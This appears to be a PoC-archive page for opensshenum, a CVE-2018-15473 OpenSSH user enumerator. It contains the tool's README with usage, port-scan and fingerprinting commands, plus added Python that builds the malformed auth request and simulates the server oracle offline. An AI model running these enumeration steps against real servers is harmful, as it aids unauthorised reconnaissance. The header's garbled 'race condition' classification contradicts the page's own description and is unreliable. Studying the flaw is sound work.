POC details: e23a09cf909748c138096d01294fae623ce66fda

Source
Related vulnerability
Title: OpenSSH race condition vulnerability (CVE-2018-15473)
Description: OpenSSH (OpenBSD Secure Shell) is a set of connection tools from the OpenBSD project for securely accessing remote computers. It is an open-source implementation of the SSH protocol that encrypts all traffic, which effectively blocks eavesdropping, connection hijacking and other network-level attacks. OpenSSH 7.7 and earlier contain a flaw that this database files under race conditions (CWE-362), i.e. improper handling of concurrent access when code needs exclusive access to a shared resource. In practice the flaw is a user-enumeration oracle: sshd handles a malformed authentication request differently depending on whether the user name exists (an unknown user is rejected before the request is fully parsed), as described in the oss-sec post linked below.
Description
CVE-2018-15473 - Opensshenum is a user enumerator exploiting an OpenSSH bug
Introduction
Description:
============

Opensshenum is an OpenSSH user enumerator: it checks an arbitrary list of user names against an OpenSSH server to learn which of them actually exist on the remote machine. The program exploits a bug (fixed in July 2018) that has been shown to work at least from OpenSSH 2.3.0 (released in November 2000).

I wrote the exploit starting from Tssh, an SSH 2 client I wrote in C++11 from scratch starting from the RFCs.

For more information read here:

http://seclists.org/oss-sec/2018/q3/124

This issue received CVE-2018-15473.
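The following is an added example written for this page, not code from opensshenum or from OpenSSH. It models, offline, the two things the paragraph above depends on: the SSH_MSG_USERAUTH_REQUEST message (RFC 4252) that the tool sends for each candidate name, and the order of checks in sshd's auth2-pubkey.c that turned a malformed request into an oracle (OpenSSH 7.7 and earlier checked whether the user was valid before parsing the publickey fields; 7.8 parses first). The "server" functions simulate only that decision order and speak no real SSH; the truncation used to make the request malformed is an illustrative choice (the original public PoC omitted only the have_sig boolean), and the account list is constructed.

```python
"""Added example: the message and server-side check order behind CVE-2018-15473,
simulated offline. Not part of opensshenum or OpenSSH."""
import struct

SSH_MSG_USERAUTH_REQUEST = 50   # RFC 4252 message numbers
SSH_MSG_USERAUTH_FAILURE = 51


class ParseError(Exception):
    """Stands in for the SSH_ERR_MESSAGE_INCOMPLETE errors of sshd's sshpkt_get_* calls."""


def ssh_string(data: bytes) -> bytes:
    """RFC 4251 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def read_string(msg: bytes, pos: int):
    """Inverse of ssh_string; raises ParseError if the packet ends early."""
    if pos + 4 > len(msg):
        raise ParseError("incomplete packet")
    (n,) = struct.unpack(">I", msg[pos:pos + 4])
    pos += 4
    if pos + n > len(msg):
        raise ParseError("incomplete packet")
    return msg[pos:pos + n], pos + n


def build_userauth_request(user: str, truncate: bool = True) -> bytes:
    """SSH_MSG_USERAUTH_REQUEST for method 'publickey'.

    truncate=True leaves out have_sig, the key algorithm and the key blob, so the
    request is syntactically incomplete (illustrative assumption: any parse failure
    in the publickey fields has the same effect)."""
    msg = (bytes([SSH_MSG_USERAUTH_REQUEST])
           + ssh_string(user.encode())
           + ssh_string(b"ssh-connection")
           + ssh_string(b"publickey"))
    if not truncate:
        # have_sig = FALSE, algorithm name, placeholder key blob that is never authorized
        msg += b"\x00" + ssh_string(b"ssh-rsa") + ssh_string(b"\x00" * 8)
    return msg


def parse_request_header(msg: bytes):
    """user, service, method: sshd parses these in auth2.c before dispatching, for
    every user, so a packet truncated here would drop all names equally."""
    if not msg or msg[0] != SSH_MSG_USERAUTH_REQUEST:
        raise ParseError("not a USERAUTH_REQUEST")
    user, pos = read_string(msg, 1)
    service, pos = read_string(msg, pos)
    method, pos = read_string(msg, pos)
    return user.decode(), service, method, pos


def parse_publickey_fields(msg: bytes, pos: int):
    """have_sig, pkalg, pkblob: the fields userauth_pubkey() reads itself."""
    if pos >= len(msg):
        raise ParseError("incomplete packet")
    have_sig, pos = msg[pos], pos + 1
    pkalg, pos = read_string(msg, pos)
    pkblob, pos = read_string(msg, pos)
    return have_sig, pkalg, pkblob


def vulnerable_server(known_users, msg: bytes):
    """OpenSSH <= 7.7 order: the 'valid user?' check comes before the publickey
    fields are parsed. Returns the reply bytes, or None when sshd would fatal()
    and close the connection."""
    user, _service, _method, pos = parse_request_header(msg)
    if user not in known_users:
        return bytes([SSH_MSG_USERAUTH_FAILURE])   # early bailout, rest of packet never read
    try:
        parse_publickey_fields(msg, pos)
    except ParseError:
        return None                                 # fatal("parse request failed")
    return bytes([SSH_MSG_USERAUTH_FAILURE])       # key is not in authorized_keys


def fixed_server(known_users, msg: bytes):
    """OpenSSH 7.8 order: parse the whole request first, bail out for an invalid
    user afterwards, so valid and invalid names are indistinguishable."""
    user, _service, _method, pos = parse_request_header(msg)
    try:
        parse_publickey_fields(msg, pos)
    except ParseError:
        return None                                 # malformed: dropped for everyone
    if user not in known_users:
        return bytes([SSH_MSG_USERAUTH_FAILURE])   # same reply as an unauthorized key
    return bytes([SSH_MSG_USERAUTH_FAILURE])


def classify(reply) -> str:
    """Verdict in opensshenum's output format: connection dropped -> OK (user
    exists), USERAUTH_FAILURE answered -> NOK (user does not exist)."""
    if reply is None:
        return "OK"
    if reply[:1] == bytes([SSH_MSG_USERAUTH_FAILURE]):
        return "NOK"
    return "UNKNOWN"


def enumerate_users(server, known_users, candidates):
    """One malformed request per candidate name against a server model."""
    return [f"{u}:{classify(server(known_users, build_userauth_request(u)))}"
            for u in candidates]


if __name__ == "__main__":
    known = {"root", "gabriel"}   # constructed target account list
    print("\n".join(enumerate_users(vulnerable_server, known, ["xxx", "gabriel"])))
    print("\n".join(enumerate_users(fixed_server, known, ["xxx", "gabriel"])))
```

Against the vulnerable model the output matches the README's "xxx:NOK / gabriel:OK"; against the fixed model both names come back with the same verdict, which is exactly why the patched server cannot be enumerated this way. A well-formed request (truncate=False) yields NOK for everyone on both models, so the oracle exists only for malformed input.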

DISCLAIMER:
===========

This code has been posted for information and educational purposes. Intruding into systems and services without the owner's authorisation is illegal. Misuse of the information and the software in this repo can result in criminal charges being brought against the perpetrator of the crime. Any actions and/or activities related to the material contained within this Git repository are solely your responsibility. The author will not be held responsible in the event that any criminal charges are brought against any individual misusing the information or the software in this website to break the law.

Prerequisites:
==============

The program is intended to be used in a *nix environment and has been tested on various Linux distributions and OS X:

- Ubuntu 17.10;
- OS X 10.11.6;

using one of the following compilers:

- gcc version 7.2.0 (Ubuntu 7.2.0-8ubuntu3.2);
- Apple LLVM version 8.0.0 (clang-800.0.42.1)

and one of the following SSH servers:

- OpenSSH_7.5p1 

The only external dependency is the OpenSSL library, used for the cryptographic functions.
I could introduce alternatives to OpenSSL in the next versions.
This program requires an OpenSSL version equal to or newer than:

- OpenSSL 1.0.2h;

(This means that on OS X an upgrade is mandatory).

To compile the program, these tools/libraries are necessary:

- a c++ compiler ( with c++11 support);
- automake/autoconf;
- libtool;
- OpenSSL 1.0.2h or superior ("dev" packages);

Installation:
=============

- launch the configure script:
  ./configure
- Compile the program:
  make
- Install the program and the man page:
  sudo make install

Instructions:
=============

It processes the user list passed on standard input, for example:

cat user.txt | ./opensshenum -i dummy_cert target_addr
xxx:NOK
gabriel:OK

where user.txt is a file containing a list of users, one per line,
and dummy_cert is a key generated with the OpenSSH command ssh-keygen
(keys are looked up in ~/.ssh by default). OK means the user exists on the target, NOK that it does not.

A program can also be used to generate the list:

printf "xxx\ngabriel" | ./src/opensshenum -i dummy_rsa localhost
xxx:NOK
gabriel:OK

See the man page included in this release.

New Features:
=============

Port Scanner:
=============

SSH port scanner capability added: opensshenum can now scan a range of ports on an address to find SSH instances listening on ports other than 22, and then run the exploit only against the ports verified that way.
This feature can also be used standalone, to obtain only the list of SSH ports without executing any attack.

Example:

  opensshenum -s -n -t2 -m22221 -M22225 -r'.*OpenSSH' -idummy_rsa my_imaginary_website.com

will scan ports (-s) between 22221 and 22225 (both included), performing only the scan (-n), with a timeout of 2 seconds (-t2), expecting a hello string matching the regular expression '.*OpenSSH' (-r), using a key named dummy_rsa (-i; I recommend generating a key only for this kind of operation), against the target my_imaginary_website.com.
More information in the man page.

Parallel Execution:
===================

An alpha script using GNU Parallel (parallenum.sh) is included as a proof of concept of the reduction in scanning time obtainable by splitting the range of ports to scan into sub-ranges, each handled by a separate process. This obviously produces a lot of noise; the -t parameter can be used to reduce it.

Fingerprinting:
===============

A fingerprint function identifies automatically the OS type (useful, for example, when the "hello" string is omitted) and the services, using a db of users and combinations of users. The db is created from *.lst files collected in a directory. Every *.lst file is named <os_name_or_service>.lst, for example:

  ubuntu_17_10.lst
  aix.lst
  proprietary_ftp.lst

The db, a csv file, has format:

  user_1;os_or_service_1; ... ;os_or_service_n
  ...
  user_m;os_or_service_1; ... ;os_or_service_n

The db can be created from the *.lst files with the createdb utility in the ./utils directory, passing the directory containing the *.lst files, for example:

  cd utils
  make
  ./createdb ../lists/

To request fingerprinting, use the -F option with the db file, for example:

   cat test/scan.sample | opensshenum -p22 -idummy_rsa -Futils/opensshenum.db  localhost
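The following is an added example written for this page, not opensshenum's createdb utility or its fingerprint routine. It shows the two halves of the fingerprinting described above in Python: turning a set of <os_name_or_service>.lst lists into the "user;os_or_service_1;...;os_or_service_n" csv, and scoring the user names an enumeration run reported as OK against that db. The list contents are constructed (the repo's real centos.lst, opensuse.lst and ubuntu_17_10.lst are not reproduced) and the scoring rule, 1/(number of lists a name appears in) per confirmed user, is this example's own choice, not necessarily the project's.

```python
"""Added example: build the user -> OS/service db from *.lst-style lists and score
an enumeration result against it. Not opensshenum's own createdb/fingerprint code."""
import os
from collections import defaultdict

# Constructed sample: <os_name_or_service> -> account names one *.lst file each would hold.
SAMPLE_LISTS = {
    "ubuntu_17_10": ["root", "daemon", "syslog", "lxd", "gabriel"],
    "centos": ["root", "daemon", "chrony", "polkitd"],
    "proprietary_ftp": ["ftpadmin", "ftpuser"],
}


def load_lst_files(paths):
    """Read real <name>.lst files (one user per line) into the dict shape above."""
    lists = {}
    for path in paths:
        name = os.path.splitext(os.path.basename(path))[0]
        with open(path) as f:
            lists[name] = [line.strip() for line in f if line.strip()]
    return lists


def build_db(lists) -> str:
    """Emit the csv format described above: user;os_or_service_1;...;os_or_service_n."""
    index = defaultdict(set)
    for name, users in lists.items():
        for user in users:
            index[user].add(name)
    return "\n".join(f"{u};{';'.join(sorted(index[u]))}" for u in sorted(index)) + "\n"


def load_db(text: str):
    """Parse the csv back into {user: {os_or_service, ...}}; blank lines are ignored."""
    db = {}
    for line in text.splitlines():
        if line.strip():
            user, *names = line.split(";")
            db[user] = set(names)
    return db


def parse_results(lines):
    """Collect the names opensshenum reported as OK (present on the target)."""
    found = set()
    for line in lines:
        user, sep, verdict = line.strip().rpartition(":")
        if sep and verdict == "OK":
            found.add(user)
    return found


def fingerprint(db, found_users):
    """Score each OS/service: a confirmed user adds 1/(number of lists it appears
    in), so names unique to one list weigh most and names present in every list
    (root, daemon) contribute little. Returns (name, score) pairs, best first."""
    scores = defaultdict(float)
    for user in found_users:
        for name in db.get(user, ()):
            scores[name] += 1.0 / len(db[user])
    return sorted(scores.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    db = load_db(build_db(SAMPLE_LISTS))
    # constructed opensshenum output lines
    found = parse_results(["xxx:NOK", "gabriel:OK", "lxd:OK", "root:OK"])
    for name, score in fingerprint(db, found):
        print(f"{name}\t{score:.2f}")
```

With the sample lists, the three confirmed names rank ubuntu_17_10 first (gabriel and lxd appear only there; root is shared with centos and is worth half a point to each), which is the kind of conclusion the -F option is meant to draw automatically when the server banner gives nothing away.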

File snapshot

[4.0K] /data/pocs/e23a09cf909748c138096d01294fae623ce66fda
├── [ 43K] aclocal.m4
├── [ 100] AUTHORS
├── [7.2K] compile
├── [ 44K] config.guess
├── [ 35K] config.sub
├── [546K] configure
├── [2.4K] configure.ac
├── [ 18K] COPYING
├── [ 906] copyright
├── [ 23K] depcomp
├── [4.0K] doc
│   └── [3.7K] opensshenum.1
├── [4.0K] include
│   ├── [1.1K] anyexcept.hpp
│   ├── [1.9K] config.h.in
│   ├── [ 17K] Crypto.hpp
│   ├── [2.5K] Fingerprint.hpp
│   ├── [6.4K] Inet.hpp
│   ├── [1.1K] Main.hpp
│   ├── [ 18K] OpenSshEnum.hpp
│   ├── [1.6K] parseCmdLine.hpp
│   ├── [8.3K] StringUtils.hpp
│   └── [5.3K] Types.hpp
├── [ 15K] INSTALL
├── [ 14K] install-sh
├── [4.0K] lists
│   ├── [ 268] centos.lst
│   ├── [ 238] opensuse.lst
│   ├── [ 20] README
│   └── [ 223] ubuntu_17_10.lst
├── [277K] ltmain.sh
├── [4.0K] m4
│   ├── [280K] libtool.m4
│   ├── [6.0K] lt~obsolete.m4
│   ├── [ 12K] ltoptions.m4
│   ├── [4.3K] ltsugar.m4
│   └── [ 690] ltversion.m4
├── [ 154] Makefile.am
├── [ 25K] Makefile.in
├── [6.7K] missing
├── [ 99] NEWS
├── [ 503] README
├── [4.8K] README.md
├── [4.0K] src
│   ├── [ 29K] CryptoImpl.cpp
│   ├── [3.9K] Fingerprint.cpp
│   ├── [ 14K] InetImpl.cpp
│   ├── [ 10K] Main.cpp
│   ├── [ 507] Makefile.am
│   ├── [ 26K] Makefile.in
│   ├── [ 55K] OpenSshEnum.cpp
│   ├── [4.6K] parallenum.sh
│   ├── [3.0K] parseCmdLine.cpp
│   ├── [ 29K] StringUtilsImpl.cpp
│   └── [2.9K] TypesImpl.cpp
├── [4.0K] utils
│   ├── [2.3K] createdb.cpp
│   └── [ 123] makefile
└── [ 6] version

6 directories, 53 files
Cached for you by the Shenlong bot
Notes
    1. Access via the source link is recommended.
    2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.